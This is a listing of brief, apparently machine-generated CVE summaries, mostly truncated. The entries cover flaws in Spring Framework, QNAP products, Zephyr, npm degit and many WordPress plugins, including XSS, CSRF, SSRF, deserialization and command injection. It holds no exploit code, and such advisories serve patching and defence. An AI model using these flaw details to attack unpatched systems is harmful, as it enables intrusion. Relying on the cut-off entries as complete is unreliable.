CVE-2026-44083

CVE-2026-44083 affects QuMagie. The vulnerability is an authorization bypass via a user-controlled key that could allow remote attackers to gain unintended privileges. Affected product: QuMagie (reported across multiple feeds). Root cause: authorization bypass enabling privilege escalation; explo...

CVE-2026-5068

CVE-2026-5068 affects Zephyr in the Bluetooth host L2CAP LE CoC path. When segmentation is enabled (chan_ops.alloc_buf) and the RX pool’s user_data_size is

CVE-2025-62858

CVE-2025-62858 is a buffer overflow affecting several QNAP OS lines (QTS 5.2.x and QuTS hero releases h5/h6) where an attacker with an administrator account could cause memory modification or process crashes. The vulnerability’s root cause is not explicitly detailed in the provided documents, but...

CVE-2026-5067

The CVE targets Zephyr’s HTTP server WebSocket upgrade path (CONFIG_HTTP_SERVER_WEBSOCKET enabled). A crafted Sec-WebSocket-Key header can trigger memory corruption via a non-NUL-terminated copy into a fixed-size buffer, followed by copying to a local stack buffer and using strlen(). If no NUL ex...

CVE-2026-8981

The CVE describes a vulnerability in the WordPress plugin Custom Block Builder (Lazy Blocks) prior to version 4.3.0 . The issue arises because the plugin does not consistently check the unfiltered_html capability across all code paths that write to its block template fields, enabling an administr...

CVE-2026-4986

The CVE-2026-4986 entry concerns the WPForms WordPress plugin (pre-1.10.0.5). The issue is that incoming PayPal webhook events are not validated for authenticity before processing, enabling unauthenticated attackers to forge webhook payloads and manipulate the payment state of arbitrary transacti...

CVE-2026-41539

CVE-2026-41539 is a cross-site scripting (XSS) vulnerability affecting several QNAP operating system versions. The issue impacts QTS 5.2.9.3492+ and QuTS hero releases: h5.2.9.3499+, h5.3.4.3500+, and h6.0.0.3500+, all built around 2026-05-07 to 2026-05-20. Root cause and technical details are no...

CVE-2026-11572

The CVE-2026-11572 entry concerns the npm package degit. Affected versions are degit before 2.8.6, versions 3.0.0 to before 3.3.1, where user input used to construct git shell commands is directly passed to exec() in _cloneWithGit() and fetchRefs(). This improper sanitisation enables a remote att...

CVE-2026-26236

CVE-2026-26236 (QuMagie) describes a missing authorization vulnerability in QuMagie that could allow remote attackers to access unauthorized data or perform unauthorized actions. The issue is rated with a high severity (CVSS v4.0: HIGH, network vector, attack complexity LOW, no privileges require...

CVE-2026-41007

Technical details are not publicly available in the provided documents. Monitor for updates.

CVE-2026-41006

Spring HATEOAS contains a deserialization vulnerability where internal PropertyUtils.createObjectFromProperties binds bean properties via reflection without honoring Jackson access-control annotations. This affects multiple supported branches: 1.5.x, 2.3.x, 2.4.x, 2.5.x, and 3.0.x up to 3.0.3. Th...

CVE-2026-41855

The CVE affects Spring Framework via unsafe deserialization in JMS converters: MappingJackson2MessageConverter and JacksonJsonMessageConverter allow arbitrary class instantiation in untrusted JMS environments, enabling gadget-based deserialization that could trigger unauthorized actions. Affected...

CVE-2026-41854

The CVE affects Spring Framework 7.0.0–7.0.7 and 6.2.0–6.2.18, where incorrect host parsing in UriComponentsBuilder may allow a server-side request forgery (SSRF) when parsing an externally provided URL string. The vulnerability is described as an SSRF condition resulting from this parsing flaw. ...

CVE-2026-41853

CVE-2026-41853 concerns Multipart request smuggling in Spring Framework’s Spring MVC and WebFlux components. Affected are Spring Framework versions: 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. The CVE entry identifies the issue as a vulnerability in multipart handling, with an accompan...

CVE-2026-41980

Technical details are not publicly available in the provided documents. This CVE entry lacks specifics on affected product/version, root cause, or remediation. Monitor for updates from Huawei advisories and the CVE record.

CVE-2026-41852

The CVE affects Spring Framework via SpEL evaluation allowing arbitrary zero-argument method invocation in restricted/read-only contexts across multiple versions (7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48). Root cause is the SpEL evaluation logic, enabling invocation of unintended app...

CVE-2026-41851

CVE-2026-41851 describes a Denial of Service risk in Spring Framework where evaluating user-provided SpEL expressions can trigger unbounded cache growth. Affected versions include Spring Framework 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The DoS arises from how SpEL expressions ...

CVE-2026-41850

Spring Framework vulnerability CVE-2026-41850 affects the evaluation of user-supplied Spring Expression Language (SpEL) expressions. The issue is an Algorithmic Denial of Service (DoS) caused by crafted expressions triggering excessive resource consumption during evaluation, degrading or taking d...

CVE-2026-41849

The CVE-2026-41849 entry affects Spring Framework 5.3.0–5.3.48 and is caused by an integer overflow in the SpEL evaluation logic. Exploitation via a crafted SpEL expression can trigger excessive resource consumption, leading to a Denial of Service. The connected documents specify the vulnerabilit...

CVE-2026-41848

CVE-2026-41848 affects Spring Framework via a ReDoS vulnerability in AntPathMatcher. Affected versions are 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The issue arises when a crafted pattern is supplied to AntPathMatcher methods (match, matchStart, extractUriTemplateVariables). The...

CVE-2026-41847

CVE-2026-41847 : Spring Framework WebFlux Kotlin Router DSL may be vulnerable to a security bypass. Affected versions: Spring Framework 5.3.0 through 5.3.48. The CVE records a bypass in WebFlux when using the Kotlin Router DSL, with a CVSS v3.1 base score of 4.8 (Medium). Impact indicators in the...

CVE-2026-41846

The CVE concerns Spring Framework: JSP form tag attributes cssClass, cssErrorClass, and cssStyle in Spring MVC applications can be exploited to inject arbitrary HTML/JavaScript, enabling cross-site scripting (XSS). Affected versions are Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5....

CVE-2026-41845

The CVE-2026-41845 entry affects Spring Framework versions 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The issue stems from incorrect escaping in JavaScriptUtils.javaScriptEscape(), which may allow JavaScript code injection in the browser and enable cross-site scripting (XSS). The ...

CVE-2026-41844

The CVE-2026-41844 entry concerns Spring Framework components Spring MVC and Spring WebFlux. Affected are Spring Framework versions 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; and 5.3.0–5.3.48. Description: when an application configures a mapping for "/**" and the view name is not explicitly specif...

CVE-2026-41843

CVE-2026-41843 affects Spring Framework, specifically Spring MVC and WebFlux, where path traversal can occur when resolving static resources. Affected versions include 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The connected documents confirm the vulnerability class as path traver...

CVE-2026-41842

The CVE-2026-41842 entry affects Spring Framework in Spring MVC and WebFlux, reporting a Denial of Service (DoS) when resolving static resources. Affected versions are Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. The description in both records states the DoS vulnerabil...

CVE-2026-41979

CVE-2026-41979 describes a permission-control vulnerability in the print module. The impact is stated as potentially affecting integrity and confidentiality, with CVSSv3.1 indicating a MEDIUM base score (5.5) and a LOCAL attack vector requiring user interaction (no privileges required, low attack...

CVE-2026-41841

CVE-2026-41841 affects Spring Framework versions 5.3.0–5.3.48; 6.1.0–6.1.27; 6.2.0–6.2.18; 7.0.0–7.0.7. It describes Information Disclosure via the static resource cache in Spring MVC and WebFlux when resolving static resources. The root cause and exact exploit path are not detailed in the provid...

CVE-2026-41840

Spring WebFlux applications are vulnerable to Denial of Service when processing multipart requests. Affected: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. CVSSv3.1: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (base score 5.9, MEDIUM). Exploitation details are not provided in th...

CVE-2026-41839

The CVE-2026-41839 affects Spring Framework WebFlux. A WebFlux application with a compromised subdomain (e.g., via XSS) is vulnerable to an escalation attack that exchanges a known session ID for that of an authenticated user. Affected versions are: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1...

CVE-2026-41838

Spring Framework's WebSocket session IDs in the spring-websocket module are not cryptographically unpredictable, enabling potential session hijacking in environments with weak authorization. Affected: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. Risk summary: predictabl...

CVE-2026-41720

CVE-2026-41720 affects Spring LDAP, where DirContextAuthenticationStrategy implementations fail to reject a bind request that uses a non-empty username with an empty or null password. Affected versions include 2.4.0–2.4.4, 3.2.0–3.2.17, 3.3.0–3.3.7, and 4.0.0–4.0.3. The CVE description in both th...

CVE-2026-41978

The CVE-2026-41978 entry documents a permission-control vulnerability in the clone module with potential confidentiality impact. CVSS v3.1 metrics indicate a MEDIUM severity (4.4), LOCAL attack vector, LOW confidentiality impact, and REQUIREMENT for user interaction. No exploit details or remedia...

CVE-2026-41715

CVE-2026-41715 affects the Reactor Netty HTTP Client. When redirects are enabled, HTTP redirects from secure to insecure endpoints may leak credentials and expose sensitive data. Affected versions are Reactor Netty 1.0.0–1.0.51; 1.1.0–1.1.35; 1.2.0–1.2.17; 1.3.0–1.3.5. The provided documents do n...

CVE-2026-41710

The CVE-2026-41710 issue affects Spring Retry versions 2.0.0–2.0.12 and 1.3.0–1.3.4. An attacker can craft a large number of unique requests that trigger failures, exhausting the application-wide stateful retry cache. Once the cache is full, it permanently rejects further updates, causing all lat...

CVE-2026-40984

CVE-2026-40984 details (from provided sources): Affects Micrometer HTTP server instrumentations across micrometer-core and micrometer-jetty variants (various versions listed in the initial entry). The vulnerability is a DoS triggered by specially crafted HTTP requests. The CVSS v3.1 base score is...

CVE-2026-41975

CVE-2026-41975 concerns a permission management vulnerability in the network management module. The available data indicate a local attack vector with high attack complexity and requires user interaction, but privileges are reported as LOW. The projected impact includes both confidentiality and a...

CVE-2026-40983

CVE-2026-40983 affects Micrometer’s gRPC server instrumentation. The issue allows a user to send specially crafted gRPC requests that may cause a denial-of-service (DoS) condition. Affected versions are Micrometer 1.16.0–1.16.5 and 1.15.0–1.15.11. The CVSSv3.1 base score is 7.5 (HIGH), with netwo...

CVE-2026-8895

CVE-2026-8895 affects the WordPress plugin kk blog card up to version 1.3. The vulnerability is a Stored Cross-Site Scripting (Stored XSS) in the plugin’s blog-card shortcode, caused by insufficient sanitization and output escaping of the shortcode’s href and type attributes. These values are con...

CVE-2026-10553

CVE-2026-10553 affects the WordPress plugin jquery-hover-footnotes (≤ 1.4) . The root cause is missing/incorrect nonce validation in the jqFootnotes_options_subpanel function, enabling unauthenticated actors to update the plugin’s settings. Updated option values (e.g., jqfoot_anchor_open, jqfoot_...

CVE-2026-8904

The CVE-2026-8904 entry concerns the WordPress plugin FastPicker, up to version 1.0.2. The underlying issue is missing or incorrect nonce validation in the settingsPage function, enabling Cross-Site Request Forgery. This allows unauthenticated attackers to modify plugin settings (e.g., webhook in...

CVE-2026-11603

CVE-2026-11603 affects the WordPress plugin Product Filter Widget for Elementor , vulnerable in all versions up to 1.0.6. The root cause is reflected Cross-Site Scripting via the args[filterFormArray] parameter, due to insufficient input sanitization and output escaping. The endpoint is registere...

CVE-2026-10738

The CVE concerns the WordPress plugin jQuery Hover Footnotes, vulnerable in all versions up to 1.4. The root cause is insufficient input sanitization and output escaping in the Footnote Qualifier using a {{...}} syntax, enabling Stored XSS for authenticated users with author-level access and abov...

CVE-2026-8910

The CVE refers to the WordPress plugin WP Emoticon Rating (versions

CVE-2026-8882

CVE-2026-8882 affects the WP ApplicantStack Jobs Display WordPress plugin (versions up to 1.1.1). The vulnerability is a Stored Cross-Site Scripting via Shortcode Attributes caused by insufficient input sanitization and output escaping, exploitable by authenticated users with contributor-level ac...

CVE-2026-7662

CVE-2026-7662 describes a Stored Cross-Site Scripting vulnerability in the WordPress plugin ePaperFlip Publisher (versions

CVE-2026-8977

The WP GDPR Cookie Consent plugin for WordPress (versions up to and including 1.0.0) is vulnerable to Stored Cross-Site Scripting via the ninja_gdpr_ajax_actions AJAX action. The root cause is multi-fold: missing capability and nonce checks in handleAjaxCalls(), insufficient input sanitization of...

CVE-2026-8909

WpMobi WordPress plugin (versions ≤ 0.0.3) is vulnerable to Cross-Site Request Forgery due to missing/incorrect nonce validation in handleSaveGeneralSettings. This allows unauthenticated attackers to modify General Settings and inject scripts into an administrator’s browser via unescaped app_name...

CVE-2026-9185

CVE-2026-9185 affects the WordPress plugin 6Storage Rentals (versions

CVE-2026-8902

CVE-2026-8902 affects the WordPress plugin “AJAX Report Comments” (versions ≤ 2.0.4). The vulnerability stems from missing or incorrect nonce validation on the rc_options_page function, enabling Cross‑Site Request Forgery. This allows unauthenticated attackers to forge requests and modify plugin ...